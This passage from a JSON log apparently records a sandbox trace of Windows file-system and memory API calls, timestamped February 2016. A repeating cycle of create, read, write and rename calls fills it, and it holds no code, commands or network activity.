"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,688", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:59,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,688", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,688", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,698", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,698", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,708", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,708", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,718", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,728", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtReadFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,728", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,728", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,738", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,738", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,738", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,748", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,748", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,758", "api": "NtFreeVirtualMemory"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,758", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,768", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,768", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,768", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:59,778", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,778", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,778", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,788", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,788", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,788", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:59,798", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,798", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,798", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,808", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,808", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,818", 
"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,818", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,828", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,838", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,848", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,858", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtSetInformationFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,868", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,878", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:59,878", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,888", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,888", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,898", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:59,908", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,908", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,918", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,928", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:59,928", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,968", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,978", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,988", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,998", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,998", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,008", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,018", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,028", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,038", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,048", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 